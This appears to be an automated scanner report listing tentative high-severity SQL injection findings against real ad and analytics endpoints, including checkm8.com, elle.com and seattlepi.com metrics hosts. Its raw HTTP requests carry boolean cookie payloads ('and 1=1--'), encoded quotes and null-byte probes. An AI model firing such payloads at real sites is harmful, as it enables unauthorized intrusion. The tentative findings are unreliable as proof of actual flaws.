HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:06 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 Set-cookie: C=oML6Y9wx3NQ0caatcS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 153976775/1228215787 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detect |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:32:15 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD3 Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba Set-cookie: C=oxY5Y9wQKLW1caaBdS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 156176306/1230315612 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:32:15 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD3 Set-cookie: C=oxY5Y9wQKLW1caaCdS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 156176306/1230315612 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detect |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:32:11 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD3 Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba Set-cookie: C=osY5Y9wQKLW1caa8cS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 156176306/1230315612 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:32:11 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD3 Set-cookie: C=osY5Y9wQKLW1caa9cS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 156176306/1230315612 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detected |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:19 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba Set-cookie: C=oYL6Y9wdWQQ0caaGdS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 153982087/1228215537 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:19 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 Set-cookie: C=oYL6Y9wdWQQ0caaHdS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 153982087/1228215537 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detected |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cm8dccp=1316276692 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:32:49 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD3 Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba Set-cookie: C=o4Y5Y9wQKLW1caa0gS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 156176306/1230315612 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cm8dccp=1316276692 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:32:49 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD3 Set-cookie: C=o4Y5Y9wQKLW1caa1gS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 156176306/1230315612 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detected |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:23 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD1 Set-cookie: A=dqR5Y9wK67ULv9UJ7MTba Set-cookie: C=o3L6Y9wUS38Scaa7dS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 140303008/1214455850 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:24 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD1 Set-cookie: C=o3L6Y9wUS38Scaa8dS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 140303008/1214455850 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detected |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cm8dccp=1316276692 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:33:04 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD1 Set-cookie: A=dqR5Y9wKWJSLv9UJ7MTba Set-cookie: C=okZ5Y9wz8F6ScaaziS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 140138687/1214289938 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cm8dccp=1316276692 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:33:04 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD1 Set-cookie: C=okZ5Y9wz8F6ScaaAiS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 140138687/1214289938 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detected |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:12 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba Set-cookie: C=oSL6Y9wdWQQ0caa6cS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 153982087/1228215537 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:12 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 Set-cookie: C=oSL6Y9wdWQQ0caa7cS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 153982087/1228215537 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detected |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291%20and%201%3d1--%20 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:42 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba Set-cookie: C=omM6Y9wdWQQ0caaCfS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 153982087/1228215537 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291%20and%201%3d2--%20 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:43 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: NY-AD2 Set-cookie: C=omM6Y9wdWQQ0caaDfS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 153982087/1228215537 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://metrics.elle.com |
Path: | /b/ss/hcfellegirlprod/1/H |
GET /b%2527/ss/hcfellegirlprod/1/H Host: metrics.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:15 GMT Server: Omniture DC/2.0.0 Content-Length: 442 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b%27/ss/hcfellegirlprod ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b%2527%2527/ss/hcfellegirlprod/1/H Host: metrics.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:15 GMT Server: Omniture DC/2.0.0 xserver: www493 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://metrics.elle.com |
Path: | /b/ss/hcfellegirlprod/1/H |
GET /b/ss/hcfellegirlprod/1%00'/H.15.1/s92564277239143 Host: metrics.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:42 GMT Server: Omniture DC/2.0.0 Content-Length: 416 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/hcfellegirlprod/1 was not found on this server. ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b/ss/hcfellegirlprod/1%00''/H.15.1/s92564277239143 Host: metrics.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:42 GMT Server: Omniture DC/2.0.0 xserver: www409 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://metrics.seattlepi |
Path: | /b/ss/hearstseattlepi/1/H |
GET /b%00'/ss/hearstseattlepi/1/H Host: metrics.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|273A64C3 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:02:42 GMT Server: Omniture DC/2.0.0 Content-Length: 400 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b%00''/ss/hearstseattlepi/1/H Host: metrics.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|273A64C3 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:02:42 GMT Server: Omniture DC/2.0.0 xserver: www600 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://metrics.seattlepi |
Path: | /b/ss/hearstseattlepi/1/H |
GET /b%2527/ss/hearstseattlepi/1/H Host: metrics.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|273A64C3 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:26:41 GMT Server: Omniture DC/2.0.0 Content-Length: 445 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b%27/ss/hearstseattlepi ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b%2527%2527/ss/hearstseattlepi/1/H Host: metrics.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|273A64C3 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:26:40 GMT Server: Omniture DC/2.0.0 xserver: www617 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://metrics.seattlepi |
Path: | /b/ss/hearstseattlepi/1/H |
GET /b/ss/hearstseattlepi%00'/1/H.21/s98951816044282 Host: metrics.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|273A64C3 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:06:31 GMT Server: Omniture DC/2.0.0 Content-Length: 419 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/hearstseattlepi was not found on this server.</ ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b/ss/hearstseattlepi%00''/1/H.21/s98951816044282 Host: metrics.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|273A64C3 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:06:31 GMT Server: Omniture DC/2.0.0 xserver: www596 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://syn.verticalacuity |
Path: | /varw/getPromo |
GET /varw/getPromo?conId Host: syn.verticalacuity.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Sat, 17 Sep 2011 16:32:03 GMT Server: nginx Content-Length: 1392 Connection: keep-alive (function() { var BASE_URL = 'http://syn.vertical var dataVar = 'recData' || 'data'; var data = {"baseUrl":"http://syn if(!window.VAData){window })(); |
